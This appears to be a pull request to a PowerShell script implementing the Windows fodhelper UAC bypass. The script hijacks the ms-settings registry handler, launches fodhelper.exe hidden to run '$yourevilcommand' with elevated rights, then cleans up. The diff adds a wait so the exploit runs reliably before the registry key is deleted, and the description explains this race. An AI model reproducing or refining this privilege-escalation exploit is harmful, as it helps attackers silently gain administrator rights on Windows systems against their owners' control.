### PR TITLE
Fix a parallel problem

### DIFF
--- a/Bypass.ps1
+++ b/Bypass.ps1
@@ -10,7 +10,10 @@ Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -
 
 #Starts the fodhelper process to execute your command.
 
-Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
+$Object = Start-Process "C:\Windows\System32\fodhelper.exe" -PassThru -WindowStyle Hidden
+
+#Prevent the fodhelper from deleting the registry before executing $yourevilcommand.
+$Object.WaitForExit()
 
 #Cleaning up the mess created.
 Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force


### PR DESCRIPTION
Since the fodhelper is executed using Start-Process, it may run in parallel with later commands. In my environment, the modified registry is deleted before $yourevilcommand is executed.

To ensure that the fodhelper works as intended, I modified it to wait to delete the registry until it finishes executing.
